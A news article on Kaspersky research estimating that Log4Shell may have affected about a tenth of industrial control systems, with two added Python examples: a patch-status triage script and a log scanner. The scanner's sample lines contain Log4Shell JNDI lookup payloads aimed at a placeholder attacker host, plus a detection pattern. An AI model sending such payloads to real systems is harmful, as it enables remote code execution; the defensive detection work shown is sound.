Log4Shell vulnerability may have affected close to 10 percent of ICS systems globally

At least one-tenth of all industrial control systems (ICS) globally may have been affected by the Log4Shell vulnerability because they use the vulnerable Java software, researchers at cybersecurity firm Kaspersky have revealed based on analysis of their telemetry data. The security firm also determined that operational technology (OT) systems appear to be almost as vulnerable as IT systems to the Log4Shell vulnerability, as evident from many vulnerability advisories recently published by vendors of ICS products. 

Apache has over the last couple of weeks released multiple updates to its Log4j library, in response to multiple vulnerabilities in its Java-based logging library used across various consumer and enterprise services, websites, applications, and OT products. The Log4Shell vulnerability was detected on Dec. 9, and other Log4j vulnerabilities have been identified. Another Log4j update has surfaced online, patching a code execution vulnerability identified in the last week of 2021. Users have now been advised to upgrade to Log4j 2.3.2 for Java 6, 2.12.4 for Java 7, or 2.17.1 for Java 8 and later.
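The upgrade advice above turned into a quick inventory triage, as an added example that is not from the article or from Kaspersky: it maps each host's Java generation to the fixed Log4j release the article lists and flags what still needs patching. The host names, Java versions and Log4j versions in the inventory are constructed.

```python
# Fixed Log4j 2.x releases per Java generation, as stated in the article.
FIXED_RELEASE = {"java6": (2, 3, 2), "java7": (2, 12, 4), "java8plus": (2, 17, 1)}

# Constructed inventory (not real hosts): what a discovery scan might return.
INVENTORY = [
    {"host": "hmi-01", "java_major": 8, "log4j": "2.14.1"},
    {"host": "hist-02", "java_major": 7, "log4j": "2.12.4"},
    {"host": "eng-ws-03", "java_major": 11, "log4j": "2.17.1"},
    {"host": "legacy-04", "java_major": 6, "log4j": "2.3.1"},
    {"host": "scada-05", "java_major": 8, "log4j": "1.2.17"},
]

def java_branch(java_major):
    """Map a Java major version to the Log4j release line it can run."""
    if java_major <= 6:
        return "java6"
    if java_major == 7:
        return "java7"
    return "java8plus"

def parse_version(text):
    """'2.17.1' -> (2, 17, 1); assumes plain dotted integers."""
    parts = tuple(int(p) for p in text.strip().split("."))
    if len(parts) != 3:
        raise ValueError(f"unexpected Log4j version format: {text!r}")
    return parts

def is_fixed(installed, branch):
    """Java 6/7 only get the backport line, so only that line's fix release counts;
    Java 8+ is fixed by 2.17.1 or anything newer."""
    required = FIXED_RELEASE[branch]
    if branch == "java8plus":
        return installed >= required
    return installed[:2] == required[:2] and installed[2] >= required[2]

def assess(host):
    """Return (hostname, status, required_version) for one inventory entry."""
    branch = java_branch(host["java_major"])
    required = ".".join(str(n) for n in FIXED_RELEASE[branch])
    try:
        installed = parse_version(host["log4j"])
    except ValueError:
        return host["host"], "unknown-version", required
    if installed[0] != 2:
        # Log4Shell is a Log4j 2.x issue; a 1.x install needs a separate review.
        return host["host"], "not-log4j2", required
    status = "fixed" if is_fixed(installed, branch) else "vulnerable"
    return host["host"], status, required

def triage(inventory):
    """Assess every host and list the ones that still need action first."""
    results = [assess(h) for h in inventory]
    return sorted(results, key=lambda r: r[1] == "fixed")
```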

Kaspersky said that the key issue with the Log4Shell vulnerability is the sheer scale of the problem: since it affects a very large number of products to varying degrees, each in its own way, identifying all vulnerable assets on a network can be a challenge, particularly in the geographically distributed, heterogeneous environments of large industrial organizations.

The second issue is that there isn’t a single simple solution that fits all organizations and all their vulnerable systems. While some systems may allow fast patching, many others are very hard to patch quickly and various mitigation measures have to be taken to protect them. The third issue is that this is not a vulnerability affecting a specific product or even a readily available common OEM component that is used in more or less the same ways in different end products, such as a licensing service. 

Fixing the vulnerability in the technology itself has also proved difficult, as a couple of days after the developer had released patches, a new attack vector was identified.

The Kaspersky report on the Log4Shell vulnerability in industrial enterprises also found that many of the vulnerable products are widely used in the electric power sector, including distributed control systems for power generation facilities, products for monitoring field equipment (transformers), asset management products, products used to control electric car charging stations, various products for system operators, and other supporting products, many of which can be integrated with SCADA (supervisory control and data acquisition) control system architecture.

In the case of the Log4Shell vulnerability, Log4j's developers allow users to define what is to be logged, as well as how (in what format) and from what source the data to be logged should be taken, Kaspersky said. A Java class stored in a remote location can be used as the source of data. The class can also be looked up and found using JNDI (Java Naming and Directory Interface), a unified interface designed to work with various directory services, such as LDAP (lightweight directory access protocol), DNS (domain name system), and RMI (remote method invocation).

As a result, a malicious actor only needs to have a specially crafted Log4j JNDI lookup string passed to a vulnerable application; it does not matter how this is done. “If the string passed contains the path to a malicious java class stored on a server controlled by the attacker, that’s all the attacker needs to ensure that the malicious code is downloaded from the server and executed in the vulnerable application’s context,” according to Kaspersky.
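Detection logic for the lookup strings described above, run over constructed web-server access log lines, as an added example that is not code from the article or from Kaspersky. It URL-decodes each line the way a web layer would before the value reaches the logger, then flags JNDI lookups that name one of the services the article lists (LDAP, RMI, DNS); the IP addresses and host names are constructed.

```python
import re
import urllib.parse

# Constructed sample lines (not from the article): a web front-end that logs
# the User-Agent header, the kind of untrusted input a vulnerable Log4j would
# evaluate as a lookup string. Line 4 is a non-JNDI lookup and must not fire.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:08:01:12 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:08:02:40 +0000] "GET /login HTTP/1.1" 200 '
    '"${jndi:ldap://malicious.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:08:02:41 +0000] "GET /login HTTP/1.1" 200 '
    '"%24%7Bjndi%3Armi%3A%2F%2Fmalicious.example%2Fb%7D"',
    '10.0.0.7 - - [10/Dec/2021:08:03:05 +0000] "GET /api HTTP/1.1" 200 "${env:HOME}"',
]

# A JNDI lookup that targets one of the naming services named in the article.
JNDI_LOOKUP_RE = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns)\s*:", re.IGNORECASE)

def normalize(text):
    """Undo URL encoding until stable, so double-encoded values are also seen
    as the application would see them after decoding."""
    previous = None
    while previous != text:
        previous = text
        text = urllib.parse.unquote(text)
    return text

def find_jndi_lookups(line):
    """Return the lower-cased service names of every JNDI lookup in one line."""
    return [m.group(1).lower() for m in JNDI_LOOKUP_RE.finditer(normalize(line))]

def scan(lines):
    """Return (line_number, [services]) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        services = find_jndi_lookups(line)
        if services:
            hits.append((number, services))
    return hits

if __name__ == "__main__":
    for number, services in scan(SAMPLE_LOG_LINES):
        print(f"line {number}: JNDI lookup via {', '.join(services)}")
```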

The Log4Shell vulnerability also significantly affects engineering systems, such as products for modeling, simulation, and developer-team collaboration that are widely used by industrial enterprises to develop new products, as well as PLM (product lifecycle management) and CAD/CAM systems, which are used not only to design and develop new products but also in the production process. The vulnerability also affects many building management systems, including physical security systems.

Kaspersky also believes that “many ICS may be vulnerable because of widely used common components, such as popular license management software used in many ICS products (unfortunately, product vendors have not yet released patches or security advisories and we cannot provide more details due to responsible disclosure considerations). Some Java implementations of the OPC UA protocol stack are also vulnerable,” it added.

The firm also identified that the other risk areas for OT systems that are currently hard to assess are associated with using vulnerable software which is not required for the facility’s operation and which may often be installed in violation of information security policies. It also warned about the industrial internet of things (IIoT) and smart energy applications, many of which, it turns out, were developed using vulnerable technology.

Although it is still difficult to say to what “extent vulnerable ICS systems are exposed to potential attacks, we hope that, unlike IT infrastructures, most vulnerable OT systems cannot accept inputs coming from untrusted sources,” Kaspersky said.
